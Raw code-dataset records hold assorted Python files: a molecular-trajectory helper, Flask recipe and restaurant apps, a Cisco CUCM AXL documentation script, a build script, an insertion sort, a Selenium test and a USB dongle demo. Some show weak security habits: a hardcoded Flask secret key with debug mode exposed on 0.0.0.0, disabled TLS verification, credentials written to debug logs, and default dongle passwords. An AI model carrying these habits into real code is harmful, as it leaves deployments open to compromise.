split_range(n_cores, 0, traj.n_frames)[rank]\n start, stop = mylist\n crdframes_string = 'crdframes ' + ','.join((str(start + 
1), str(stop)))\n\n for idx, line in enumerate(my_lines):\n if not line.lstrip().startswith('reference'):\n my_lines[idx] = ' '.join(('crdaction traj', line, crdframes_string\n ))\n\n # do not use 'extend' in this case\n # will get weird output\n my_lines = ['loadtraj name traj', ] + my_lines\n\n state = _load_batch(my_lines, traj)\n\n state.run()\n if dtype == 'dict':\n # exclude DatasetTopology and TrajectoryCpptraj\n return (rank, state.data[2:].to_dict())\n else:\n raise ValueError('must use dtype=\"dict\"')\n","sub_path":"pytraj/parallel/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":7518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"513514104","text":"\"\"\"Server for recipe conversion app.\"\"\"\n\nfrom flask import (Flask, render_template, request, flash, session,\n redirect)\n\nfrom model import connect_to_db\nimport crud\n\nfrom jinja2 import StrictUndefined\n\napp = Flask(__name__)\napp.secret_key = \"RANDOM SECRET KEY\"\napp.jinja_env.undefined = StrictUndefined\n\n# Replace this with routes and view functions!\n\n@app.route('/')\ndef homepage():\n \"\"\"View homepage. 
Has button for existing user to log in and button to create new account\"\"\"\n\n user_email = request.args.get('email')\n user_password = request.args.get('password')\n\n return render_template('homepage.html')\n\n\n\n@app.route('/create_new_account')\ndef create_new_account():\n \"\"\"Create new user account with email and password.\"\"\"\n\n username = request.args.get('username')\n user_email = request.args.get('email')\n user_password = request.args.get('password')\n \n return render_template('create_new_account.html')\n\n#need to set username to session; for create account and for log in\n\n\n@app.route('/user_profile_page')\ndef user_profile_page():\n \"\"\"Displays user's profile page.\"\"\"\n\n return render_template('user_profile_page.html')\n\n\n\n@app.route('/build_recipe')\ndef build_recipe():\n \"\"\" User can build a recipe and set it to dietary specification \"\"\"\n\n return render_template('build_recipe.html')\n\n\n@app.route('/get_ingredients', methods=['POST'])\ndef get_ingred_from_user():\n \"\"\" Gets ingredients user enters; saves to session \"\"\" #Trying to add ingredient to session; to then display on next page\n \n GLUTEN_TO_GF = { \n '1/2 cup all purpose flour': (('1/2 cup', 'gluten-free flour'), ('1/8 tsp.', 'xantham gum')),\n '1 cup all purpose flour': (('1 cup gluten-free flour'), ('1/4 tsp. 
xantham gum')),\n }\n\n recipe_name = request.form.get('recipe_name')\n recipe_instructions = request.form.get('recipe_instructions')\n num_servings = request.form.get('num_servings')\n prep_time_in_min = request.form.get('prep_time_in_min')\n cook_time_in_min = request.form.get('cook_time_in_min')\n ingredient = request.form['ingred_1']\n measurement = request.form['ingred_1_M']\n details = request.form.get('ingred_1_details')\n\n print(recipe_name, recipe_instructions, num_servings, prep_time_in_min, cook_time_in_min, ingredient, measurement, details) \n\n # create a recipe object:\n # create_recipe(user_id, recipe_name, recipe_instructions, num_servings, prep_time_in_min, cook_time_in_min, image)\n crud.create_recipe(recipe_name, recipe_instructions, num_servings, prep_time_in_min, cook_time_in_min) #NOTE: user_id and image not defined- get errors\n\n # f'{measurement} {ingredient}' check this as key in GLUTEN_TO_GF and grab the correct value/tuple\n # with the above recipe you've just created, now create the ingredient object \n # with the new converted ingredient and measurement based on the value/tuple above\n\n \n # return redirect('/display_recipe') \n return 'Success' \n\n\n@app.route('/display_recipe')\ndef display_recipe():\n \"\"\" User receives back recipe according to dietary specification \"\"\"\n\n return render_template('display_recipe.html')\n\n\n\n@app.route('/user_logged_out')\ndef user_logged_out():\n \"\"\"Tells user that they've successfully logged out; has button that links back to homepage.\"\"\"\n\n return render_template('user_logged_out.html') \n\n\n\nif __name__ == \"__main__\":\n # DebugToolbarExtension(app)\n connect_to_db(app)\n app.run(host=\"0.0.0.0\", debug=True)","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"164732977","text":"#!/usr/bin/env python3\n__author__ = 'Andrea Dainese 
'\n__copyright__ = 'Andrea Dainese '\n__license__ = 'https://www.gnu.org/licenses/gpl.html'\n__revision__ = '20180903'\n\nfrom zeep.cache import SqliteCache\nimport getopt, glob, jinja2, lxml, logging, markdown, os, requests, sys, yaml, urllib3, zeep\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\ndef usage():\n print('Usage: {} [OPTIONS]'.format(sys.argv[0]))\n print(' -d enable debug')\n print(' -f STRING path to Cisco AXLAPI.wsdl file')\n print(' -i STRING CUCM IP address or FQDN')\n print(' -p STRING CUCM password')\n print(' -t STRING AutoDOC template')\n print(' -u STRING CUCM username')\n print(' -w STRING AutoDOC working directory')\n sys.exit(1)\n\ndef main():\n binding_name = \"{http://www.cisco.com/AXLAPIService/}AXLAPIBinding\"\n cucm_url = None\n cucm_username = None\n cucm_password = None\n debug = False\n template_dir = None\n working_dir = None\n wsdl_file = None\n\n # Configure logging\n logging.basicConfig()\n logger = logging.getLogger()\n zeep_transport_logger = logging.getLogger('zeep.transports')\n logger.setLevel(logging.ERROR)\n\n # Reading options\n try:\n opts, args = getopt.getopt(sys.argv[1:], 'df:i:p:t:u:w:')\n except getopt.GetoptError as err:\n logger.error('exception while parsing options', exc_info = debug)\n usage()\n for opt, arg in opts:\n if opt == '-d':\n debug = True\n logger.setLevel(logging.DEBUG)\n zeep_transport_logger.setLevel(logging.DEBUG)\n zeep_transport_logger.propagate = True\n elif opt == '-f':\n wsdl_file = os.path.abspath('{}/{}'.format(os.getcwd(), arg))\n elif opt == '-i':\n cucm_url = 'https://{}:8443/axl/'.format(arg)\n elif opt == '-p':\n cucm_password = arg\n elif opt == '-t':\n template_dir = os.path.abspath('{}/templates/{}'.format(os.getcwd(), arg))\n elif opt == '-u':\n cucm_username = arg\n elif opt == '-w':\n working_dir = os.path.abspath('{}/working/{}'.format(os.getcwd(), arg))\n else:\n logger.error('unhandled option ({})'.format(opt))\n usage()\n\n # Checking options\n if 
len(sys.argv) == 1:\n usage()\n if not wsdl_file:\n logger.error('WSDL file not specified')\n sys.exit(1)\n if not os.path.isfile(wsdl_file):\n logger.error('WSDL file \"{}\" not found'.format(wsdl_file))\n sys.exit(1)\n if not cucm_url:\n logger.error('CUCM host not specified')\n sys.exit(1)\n if not cucm_username:\n logger.error('CUCM username not specified')\n sys.exit(1)\n if not cucm_password:\n logger.error('CUCM password not specified')\n sys.exit(1)\n if not template_dir:\n logger.error('template directory not specified')\n sys.exit(1)\n if not os.path.isdir(template_dir):\n logger.error('template directory \"{}\" not found'.format(template_dir))\n sys.exit(1)\n if not working_dir:\n logger.error('working directory not specified')\n sys.exit(1)\n try:\n os.makedirs(working_dir, mode = 0o755, exist_ok = True)\n except Exception as err:\n logger.error('failed to create working directory \"{}\" (exception)'.format(working_dir), exc_info = debug)\n sys.exit(1)\n logger.debug('wsdl_file is \"{}\"'.format(wsdl_file))\n logger.debug('cucm_url is \"{}\"'.format(cucm_url))\n logger.debug('CUCM credentials are \"{}:{}\"'.format(cucm_username, cucm_password))\n logger.debug('template_dir is \"{}\"'.format(template_dir))\n logger.debug('working_dir is \"{}\"'.format(working_dir))\n\n # Configure Jinja2\n templateLoader = jinja2.FileSystemLoader(searchpath = template_dir)\n templateEnv = jinja2.Environment(loader = templateLoader)\n\n # Configure Zeep (for SOAP requests)\n session = requests.Session()\n session.verify = False\n session.auth = requests.auth.HTTPBasicAuth(cucm_username, cucm_password)\n transport = zeep.transports.Transport(cache = SqliteCache(), session = session, timeout = 20)\n history = zeep.plugins.HistoryPlugin()\n client = zeep.Client(wsdl = wsdl_file, transport = transport, plugins = [history])\n axl = client.create_service(binding_name, cucm_url)\n\n # Defining request data\n listUser = {\n 'searchCriteria': {\n 'lastName': '%'\n },\n 
'returnedTags': {\n 'firstName': '',\n 'lastName': '',\n 'userid': '',\n 'telephoneNumber': ''\n }\n }\n\n listPhone = {\n 'searchCriteria': {\n 'name': '%'\n },\n 'returnedTags': {\n 'name': '',\n 'description': '',\n 'model': '',\n 'isActive': ''\n\n }\n }\n\n getPhone = {\n 'name': 'SEPCC5A5362CE1C'\n }\n\n sql = {\n 'sql': \"SELECT description, dnorpattern FROM numplan np WHERE np.tkpatternusage = 2 AND np.iscallable = 'f'\"\n }\n\n # Getting data from the CUCM\n try:\n users = axl.listUser(**listUser)['return']['user']\n except zeep.exceptions.Fault:\n logger.error('failed to get users via SOAP request', exc_info = debug)\n for hist in [history.last_sent, history.last_received]:\n logging.debug(lxml.etree.tostring(hist['envelope'], encoding = 'unicode', pretty_print = True))\n\n try:\n phones = axl.listPhone(**listPhone)['return']['phone']\n except zeep.exceptions.Fault:\n logger.error('failed to get phones via SOAP request', exc_info = debug)\n for hist in [history.last_sent, history.last_received]:\n logging.debug(lxml.etree.tostring(hist['envelope'], encoding = 'unicode', pretty_print = True))\n # Better read object per object, more details, less errors on API. 
Even if it slower\n #try:\n # phone = axl.getPhone(**getPhone)['return']\n # print(phone)\n #except zeep.exceptions.Fault:\n # for hist in [history.last_sent, history.last_received]:\n # print(lxml.etree.tostring(hist[\"envelope\"], encoding=\"unicode\", pretty_print=True))\n\n #try:\n # # Read the CUCM Data Dictionary\n # sql_result = axl.executeSQLQuery(**sql)['return']\n # print(sql_result)\n #except zeep.exceptions.Fault:\n # for hist in [history.last_sent, history.last_received]:\n # print(lxml.etree.tostring(hist[\"envelope\"], encoding=\"unicode\", pretty_print=True))\n\n # Create MarkDown files from Jinja2 templates and fetched data\n for template_file in glob.glob('{}/*.md'.format(template_dir)):\n template_data = {\n 'users': users,\n 'phones': phones\n }\n template = templateEnv.get_template(os.path.basename(template_file))\n outputText = template.render(template_data)\n file = open('{}/{}'.format(working_dir, os.path.basename(template_file)), 'w')\n file.write(outputText)\n file.close()\n\nif __name__ == '__main__':\n main()\n sys.exit(0)\n","sub_path":"get_cucm_info.py","file_name":"get_cucm_info.py","file_ext":"py","file_size_in_byte":7102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"126765584","text":"import os\nimport shutil\nfrom distutils.dir_util import copy_tree\nimport build_util\n\nBUILD_PATH = os.getcwd()\nWORKSPACE_PATH = f\"{os.getcwd()}/../autolens_workspace\"\nNOTEBOOKS_ROOT_PATH = f\"{WORKSPACE_PATH}/notebooks\"\nNOTEBOOKS_NO_RUN = [\n \"mask.ipynb\",\n \"positions.ipynb\",\n \"lens_light_centre.ipynb\",\n \"scaled_dataset.ipynb\",\n \"tutorial_3_lens_and_source.ipynb\",\n \"tutorial_4_x2_lens_galaxies.ipynb\",\n \"tutorial_5_complex_source.ipynb\",\n \"tutorial_8_model_fit.ipynb\",\n \"tutorial_6_model_fit.ipynb\",\n \"tutorial_2_samples.ipynb\",\n \"tutorial_searches.ipynb\",\n \"hyper_mode.ipynb\",\n \"pipeline.ipynb\",\n 
\"light_parametric__mass_total__source_inversion.ipynb\",\n \"Emcee.ipynb\",\n \"PySwarms.ipynb\",\n \"Zeus.ipynb\",\n \"EmceePlotter.ipynb\",\n \"PySwarmsPlotter.ipynb\",\n \"ZeusPlotter.ipynb\",\n \"UltraNestPlotter.ipynb\",\n \"DynestyPlotter.ipynb\",\n]\n\ndef main():\n\n copy_tree(f\"autolens/configs/default\", f\"{WORKSPACE_PATH}/config\")\n\n os.chdir(WORKSPACE_PATH)\n build_util.execute_notebook(\"introduction.ipynb\")\n\n if os.path.exists(f\"{WORKSPACE_PATH}/output\"):\n try:\n os.rename(f\"{WORKSPACE_PATH}/output\", f\"{WORKSPACE_PATH}/output_backup\")\n except OSError:\n shutil.rmtree(f\"{WORKSPACE_PATH}/output\")\n\n if not os.path.exists(f\"{WORKSPACE_PATH}/auto_files\"):\n os.system(\"git clone https://github.com/Jammy2211/auto_files --depth 1\")\n\n os.system(f\"cp -r {WORKSPACE_PATH}/auto_files/autolens/output {WORKSPACE_PATH}\")\n\n os.chdir(NOTEBOOKS_ROOT_PATH)\n\n for folder in [\n \"howtolens\",\n # \"database\"\n ]:\n\n build_util.exexcute_notebooks_in_folder(\n ROOT_PATH=f\"{NOTEBOOKS_ROOT_PATH}/{folder}\",\n NOTEBOOKS_NO_RUN=NOTEBOOKS_NO_RUN\n )\n\n os.chdir(BUILD_PATH)\n copy_tree(f\"autolens/configs/test\", f\"{WORKSPACE_PATH}/config\")\n\n for folder in [\n # \"imaging\",\n # \"interferometer\",\n # \"point_source\",\n # \"misc\",\n \"plot\"\n ]:\n\n build_util.exexcute_notebooks_in_folder(\n ROOT_PATH=f\"{NOTEBOOKS_ROOT_PATH}/{folder}\",\n NOTEBOOKS_NO_RUN=NOTEBOOKS_NO_RUN\n )\n\n shutil.rmtree(f\"{WORKSPACE_PATH}/output\")\n os.rename(f\"{WORKSPACE_PATH}/output_backup\", f\"{WORKSPACE_PATH}/output\")\n\n os.chdir(BUILD_PATH)\n copy_tree(f\"autolens/configs/default\", f\"{WORKSPACE_PATH}/config\")\n os.chdir(WORKSPACE_PATH)\n os.system(f\"git add -f config\")\n os.chdir(BUILD_PATH)\n\n os.chdir(WORKSPACE_PATH)\n shutil.rmtree(\"auto_files\")\n\n\nif __name__ == \"__main__\":\n 
main()\n","sub_path":"autolens/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"268636655","text":"from functools import wraps\nfrom flask import render_template, redirect, url_for, flash, request\nfrom restaurantmenu.database_setup import Restaurant, MenuItem, MenuItemRating, User\nfrom flask import session as login_session\n\nfrom restaurantmenu import app\n\n\n##############################################################################\n# Decorators\n##############################################################################\ndef check_authorization(func):\n \"\"\"First checking user login state.\n Redirects browser to main page if not logged in.\n :param func:\n \"\"\"\n @wraps(func)\n def wrapper(*args, **kwargs):\n if 'username' not in login_session:\n return redirect(url_for('restaurants'))\n return func(*args, **kwargs)\n\n return wrapper\n##############################################################################\n# Render template - These app.routes respond with web pages.\n###############################################################################\n@app.route('/')\ndef restaurants():\n \"\"\"Returns a public main page showing list of restaurants.\"\"\"\n context = {'title': 'Restaurants',\n 'username': login_session.get('username', ''),\n 'picture': login_session.get('picture', '')\n }\n return render_template('index.html', **context)\n\n\n@app.route('/menu/')\n@app.route('/menu/')\ndef restaurant_view(restaurant_id):\n \"\"\"Returns a public main page showing list of restaurants menu items.\n Editing and rating buttons are disabled if user is not logged in\n :param restaurant_id:\n \"\"\"\n restaurant = app.Restaurant().get(restaurant_id)\n if restaurant is None:\n return redirect(url_for('restaurants'))\n context = {'title': 'Menu',\n 'restaurant': restaurant.sdict,\n 'username': login_session.get('username', ''),\n 
'picture': login_session.get('picture', '')\n }\n return render_template('menu.html', **context)\n\n\n@app.route('/form/item/')\n@check_authorization\ndef item_form(restaurant_id):\n \"\"\"Returns a private page for ADDING and EDITING menu_item\n Redirects to restaurant list if user is not logged in.\n :param restaurant_id:\n \"\"\"\n item_id = request.args.get('id', None)\n rating = request.args.get('rating', 0)\n restaurant = app.Restaurant().get(restaurant_id)\n context = {\n 'title': 'Edit Item' if item_id else 'New Item',\n 'restaurant': restaurant.sdict,\n 'item': None,\n 'rating': rating,\n 'username': login_session.get('username', ''),\n 'picture': login_session.get('picture', '')\n }\n if item_id is not None:\n context['item'] = app.MenuItem().get(item_id).sdict\n return render_template('form_item.html', **context)\n\n\n@app.route('/form/restaurant')\n@check_authorization\ndef restaurant_form():\n \"\"\"Returns a private page for ADDING or EDITING a restaurant.\n Redirects to restaurant list if user is not logged in.\n \"\"\"\n r_id = request.args.get('id', None)\n context = {\n 'title': 'Edit Restaurant' if r_id else 'New Restaurant',\n 'restaurant': None,\n 'username': login_session.get('username', ''),\n 'picture': login_session.get('picture', '')\n }\n if r_id is not None:\n context['restaurant'] = app.Restaurant().get(r_id).sdict\n return render_template('form_restaurant.html', **context)\n\n\n@app.route('/random_favorites')\n@check_authorization\ndef random_favorites():\n \"\"\"Returns a **private** page displaying a random selection of favorites.\n Redirects to restaurant list if user is not logged in.\n \"\"\"\n context = {\n 'title': 'Favorites',\n 'username': login_session.get('username', ''),\n 'picture': login_session.get('picture', '')\n }\n return render_template('favorites.html', 
**context)\n\n","sub_path":"vagrant/restaurantmenu/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"553412047","text":"# The insertion sort\n\n\nclass InsertionSort:\n @staticmethod\n def find_first_greater_than(lst, start_idx, end_idx, current_idx):\n # let the number of sorted items as n\n # WORST CASE: it takes n*C1\n for i in range(end_idx, start_idx - 1, -1):\n if lst[i] < lst[current_idx]:\n return i + 1, lst[i + 1]\n # if none of the item in the given range is smaller than the current one\n return 0, lst[0]\n\n @staticmethod\n def insert(lst, from_idx, to_idx):\n # assume to_idx > from_idx for insertion sort\n # let the number of sorted items as n\n # WORST CASE: it takes n*C1\n temp = lst[from_idx]\n for i in range(from_idx, to_idx - 1, -1):\n lst[i] = lst[i - 1]\n lst[to_idx] = temp\n\n @staticmethod\n def insertion_sort(lst):\n # the values with idx smaller than the sorted_until_idx are sorted.\n # the val in the sorted_until_idx is NOT SORTED\n sorted_until_idx = 0\n\n # let the number of entire list as N\n # let the number of sorted items as n\n # iterating from idx = 0 to idx N\n while sorted_until_idx != len(lst):\n insert_to_idx, insert_to_value = InsertionSort.find_first_greater_than(lst, 0, sorted_until_idx - 1,\n sorted_until_idx)\n InsertionSort.insert(lst, sorted_until_idx, insert_to_idx)\n sorted_until_idx += 1\n # time complexity\n # WORST CASE:\n # the insert_to_idx is always 0 or always is inserting to the first item\n # i.e. the reverse sorted list: [4,3,2,1]\n # the find_first_greater_than takes nC1\n # the insert takes nC2\n # in the 1st iteration the sorted item: 0\n # T(N) = 0(C1 + C2) + 1(C1 + C2) + ... 
+ (N-1)(C1 + C2)\n # T(N) = C3((0 + N - 1) * (N) / 2)\n # O(N) = N * N\n # insertion sort is practice than most other O(N*N) sorting algorithms\n","sub_path":"sorting/src/insertion_sort.py","file_name":"insertion_sort.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"107401310","text":"import yaml\nimport unittest\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nimport os\nimport time\ndef readYaml():\n path=os.getcwd()\n filepath=path+r'\\yamlselenium\\info.yaml'\n info=open(filepath,'r',encoding='utf-8')\n #在yaml5.1 之前 使用yaml.load是不安全的。虽然仍然能够输出,但是会给出警告\n # calling yaml.load() without Loader=... is deprecated as the default Loader is unsafe\n data=yaml.load(info,Loader=yaml.FullLoader)\n info.close()\n return data\nprint(readYaml())\n\nclass TestSearch(unittest.TestCase):\n def setUp(self):\n self.driver=webdriver.Chrome()\n self.url=\"https://www.baidu.com/\"\n WebDriverWait(self.driver,3)\n # pass\n def tearDown(self):\n # self.driver.quit()\n pass\n def eee(self,name):\n self.driver.find_element_by_id(\"kw\").send_keys(name)\n #函数一定要以小写的test开头否则不执行。 \n def testBdSearch(self):\n print(readYaml()['User']['name'])\n self.driver.get(self.url)\n \n self.eee(readYaml()['User']['name'])\n # self.driver.find_element_by_id(\"kw\").send_keys(readYaml())\n # self.driver.find_element_by_id('kw').send_keys(name)\n time.sleep(3)\n \nif __name__==\"__main__\":\n unittest.main()\n\n","sub_path":"yamlselenium/yamlTest.py","file_name":"yamlTest.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"68791458","text":"# -- coding: utf-8 --\nimport Psyunew6\nimport sys\nfrom ctypes import *\n\nSIGN_LEN= (64*2+1)\nSM2_ADDBYTE= 97\nMAX_ENCLEN= 128\nMAX_DECLEN= (MAX_ENCLEN + SM2_ADDBYTE)\nSM2_USENAME_LEN= 
80\n\t\nKeyPath=create_string_buffer(260)\n\nret=c_int()\nver=c_int()\nverEx=c_int()\n\nret=Psyunew6.FindPort(0,KeyPath)\nif(ret==0):\n\n##\t /*查找是否存在指定的加密狗,如果找到,则返回0,KeyPath为锁所在的返回设备所在的路径。\n## '1、首先使用我们的开发工具来设置自定义的算法密钥\n## '2、在让加密锁进行加密运算那里随意输入一个数\n## '3、然后读出对应的检验码(即加密后的数据),\n## '4、然后将输入的数和返回的数替换这里的参数“1”及参数“134226688”\n## '5、提示,设置不同的自定义密钥,对于同一输入数据,返回的检验码不相同*/\n\t#\n\t\t\t\n if Psyunew6.FindPort_2(0, 1, 134226688, KeyPath) != 0:\n print('未找到指定的加密锁\\n')\n else:\n print('找到指定的加密锁\\n')\n\n## //使用普通算法二来查找指定的加密锁\n## /*查找是否存在指定的加密狗,如果找到,则返回0,KeyPath为锁所在的返回设备所在的路径。\n## 注意!!!!!!!!!这里的参数“1”及参数“134226688”,随每个软件开发商的不同而不同,因为每个开发商的加密锁的加密算法都不一样,\n## 1、运行我们的开发工具,\n## 2、在“算法设置及测试页”-》“加密”-》“请输入要加密的数据”那里随意输入一个数\n## 3、然后单击“加密数据(使用普通算法二)”\n## 4、然后就会返回对应的数据(即“加密后的数据”),\n## 然后将输入的数和返回的数替换这里的参数“1”及参数“134226688”*/\n if Psyunew6.FindPort_3(0, 1, 134226688, KeyPath) != 0:\n print('未找到指定的加密锁\\n')\n else:\n print('找到指定的加密锁\\n')\n\n\n## 用于返回加密狗的ID号,加密狗的ID号由两个长整型组成。\n ID_1=c_ulong(1)\n ID_2=c_ulong()\n ret=Psyunew6.GetID(byref(ID_1),byref(ID_2),KeyPath)\n if ret==0 :\n print('锁ID是:%08x--%08x\\n' %(ID_1.value,ID_2.value))\n else:\n print('返回ID错误\\n')\n\n#用于返回加密狗的版本号\n ret=Psyunew6.NT_GetIDVersion(byref(ver),KeyPath)\n if ret==0 :\n print('锁的版本号是:%d\\n'%(ver.value))\n else:\n print('返回版本号错误\\n')\n\n## //对输入的数进行加密运算,然后读出加密运算后的结果(使用普通算法一)\t\n m_in1=c_ulong(1)\n m_out1=c_ulong()\n if Psyunew6.sWriteEx(m_in1,byref(m_out1), KeyPath)!= 0 :\n print( '(使用普通算法一)加密错误\\n')\n else:\n print( '(使用普通算法一)加密成功,对数据1加密后的结果是:%d\\n'%m_out1.value)\n\n## //对输入的数进行解密运算,然后读出解密运算后的结果(使用普通算法一)\t\n m_in2=c_ulong(1)\n m_out2=c_ulong()\n if Psyunew6.sWrite_2Ex(m_in2,byref(m_out2), KeyPath)!= 0 :\n print( '(使用普通算法一)解密错误\\n')\n else:\n print( '(使用普通算法一)解密成功,对数据1解密后的结果是:%d\\n'%m_out2.value)\n\n## //对输入的数进行加密运算,然后读出加密运算后的结果,(使用普通算法二)\n if Psyunew6.NT_GetIDVersion(byref(ver),KeyPath) != 0 :\n print( '返回加密锁扩展版本号错误\\n')\n exit()\n if ver.value<10 :\n print( '锁的扩展版本少于10,不支持普通算法二')\n else:\n if 
Psyunew6.sWriteEx_New(m_in1,byref(m_out1), KeyPath)!= 0 :\n print( '(使用普通算法二)加密错误\\n')\n else:\n print( '(使用普通算法二)加密成功,对数据1加密后的结果是:%d\\n'%m_out1.value)\n\n## //对输入的数进行解密运算,然后读出解密运算后的结果(使用普通算法二)\n if Psyunew6.NT_GetIDVersion(byref(ver),KeyPath) != 0 :\n print( '返回加密锁扩展版本号错误\\n')\n exit()\n if ver.value<10 :\n print( '锁的扩展版本少于10,不支持普通算法二')\n else:\n if Psyunew6.sWrite_2Ex_New(m_in2,byref(m_out2), KeyPath)!= 0 :\n print( '(使用普通算法二)解密错误\\n')\n else:\n print( '(使用普通算法二)解密成功,对数据1解密后的结果是:%d\\n'%m_out2.value)\n\n\n#注意,如果是普通单片机芯片,储存器的写次数是有限制的,写次数为1000次,读不限制,如果是智能芯片,写的次数为10万次\n#写入字符串到加密锁中,使用默认的写密码ffffffff', 'ffffffff'.encode('utf-8'), 写入到加密锁的第0个地址\t\n InString='加密锁'.encode('utf-8')\n ret = Psyunew6.YWriteString(InString, 0, 'ffffffff'.encode('utf-8'), 'ffffffff'.encode('utf-8'), KeyPath)\n if ret != 0 :\n print('写字符串失败\\n') \n else:\n print('写入成功。写入的字符串的长度是:%d\\n'%(len(InString)))\n\n#从加密锁中读取字符串,使用默认的读密码:ffffffff', 'ffffffff'.encode('utf-8'), 从加密锁的第0个地址开始读\n mylen=c_short()\n mylen = 9#注意这里的长度,长度要与写入的字符串的长度相同,\n outstring=create_string_buffer((mylen+1))\t\t\n if Psyunew6.YReadString(outstring, 0, mylen, 'ffffffff'.encode('utf-8'), 'ffffffff'.encode('utf-8'), KeyPath) != 0:\n print('读字符串失败\\n') \n else:\n print('读字符串成功:%s\\n'%(outstring.value))\n\n\n#注意,如果是普通单片机芯片,储存器的写次数是有限制的,写次数为1000次,读不限制,如果是智能芯片,写的次数为10万次\n#写入字符串带长度,这个代码与上面的不同的是:写入字符串的同时将字符串的长度也一并写入,\n#使用默认的写密码ffffffff', 'ffffffff'.encode('utf-8'), 写入到加密锁的第200个地址\n InArray=c_ubyte*1\n InString = '加密锁'.encode('utf-8')\n blen = InArray(len(InString))\n \n #写入字符串到地址200+1\t\t\t\n ret = Psyunew6.YWriteString(InString, 200+1, 'ffffffff'.encode('utf-8'), 'ffffffff'.encode('utf-8'), KeyPath)\n if ret != 0 :\n print('写入字符串错误\\n' )\n #写入字符串的长度到地址200,写入的长度为1\n ret = Psyunew6.YWrite(byref(blen), 200, 1, 'ffffffff'.encode('utf-8'), 'ffffffff'.encode('utf-8'), KeyPath)\n if ret != 0 :\n print('写入字符串长度错误。\\n')\n else:\n print('写入字符串成功\\n')\n\t\n#读取字符串带长度,这个代码与上面不同的是:先将事先写入到锁中的字符串长度取出,再读取指定长度的字符串\n \n#先从地址200读到以前写入的字符串的长度\t\t\n ret = 
Psyunew6.YRead(blen, 200, 1, 'ffffffff'.encode('utf-8'), 'ffffffff'.encode('utf-8'), KeyPath)\n if ret != 0 :\n print('读取字符串长度错误。\\n')\n outstring=create_string_buffer(blen[0])\t\t\n#再从地址201读取指定长度的字符串\n ret = Psyunew6.YReadString(outstring, 200+1, blen[0], 'ffffffff'.encode('utf-8'), 'ffffffff'.encode('utf-8'), KeyPath)\n if ret != 0 :\n print('读取字符串错误\\n' )\n else:\n print('已成功读取字符串:%s\\n'%(outstring.value))\n\n#写二进制数据到锁中,使用默认的写密码:'ffffffff'.encode('utf-8'), 'ffffffff'.encode('utf-8'), 写入到加密锁中的第300个地址\t\t\n InArray_2=c_ubyte*50\n InBuf=InArray_2()\n mylen=20#要写入的数据长度为20\t\t\n for n in range(0,20):\n InBuf[n]=(n)\n \n #要写入的地址为300\n ret = Psyunew6.YWrite(byref(InBuf), 300, mylen,'ffffffff'.encode('utf-8'), 'ffffffff'.encode('utf-8'), KeyPath)\n if ret != 0 :\n print('写入二进制数据错误\\n') \n else:\n print('已成功读取二进制数据\\n')\n\n# 设置锁的读密码,注意设置锁的读密码,是输入原来的“写”密码,而不是原来的“读”密码\n if Psyunew6.SetReadPassword('ffffffff'.encode('utf-8'),'ffffffff'.encode('utf-8'),'ffffffff'.encode('utf-8'),'ffffffff'.encode('utf-8'),KeyPath)!=0:\n print( '设置读密码失败\\n')\n else:\n print( '设置读密码成功\\n')\n\t\n\t# 设置锁的写密码\n\t\n if Psyunew6.SetWritePassword('ffffffff'.encode('utf-8'),'ffffffff'.encode('utf-8'),'ffffffff'.encode('utf-8'),'ffffffff'.encode('utf-8'),KeyPath)!=0 :\n print( '设置写密码失败\\n')\n else:\n print( '设置写密码成功\\n')\n\n\n#设置增强算法密钥一\n#注意:密钥为不超过32个的0-F字符,例如:1234567890ABCDEF1234567890ABCDEF,不足32个字符的,系统会自动在后面补0\n Key='1234567890ABCDEF1234567890ABCDEF'.encode('utf-8')\n ret = Psyunew6.SetCal_2(Key, KeyPath)\n if ret != 0:\n print('设置增强算法密钥错误\\n')\n else:\n print('已成功设置了增强算法密钥\\n')\n\n##使用增强算法一对字符串进行加密\n InString = '加密锁'.encode('utf-8')\n mylen = len(InString)+1\n if mylen < 8 :\n mylen = 8 \n outstring =create_string_buffer((mylen* 2+1))#//注意,这里要加1一个长度,用于储存结束学符串\t\t\t\n ret = Psyunew6.EncString(InString, outstring, KeyPath)\n if ret != 0:\n print('加密字符串出现错误\\n') \n else:\n print('已成功对字符串进行加密,加密后的字符串为:%s\\n' % outstring.value)\n \n## //推荐加密方案:生成随机数,让锁做加密运算,同时在程序中端使用代码做同样的加密运算,然后进行比较判断。\n## 
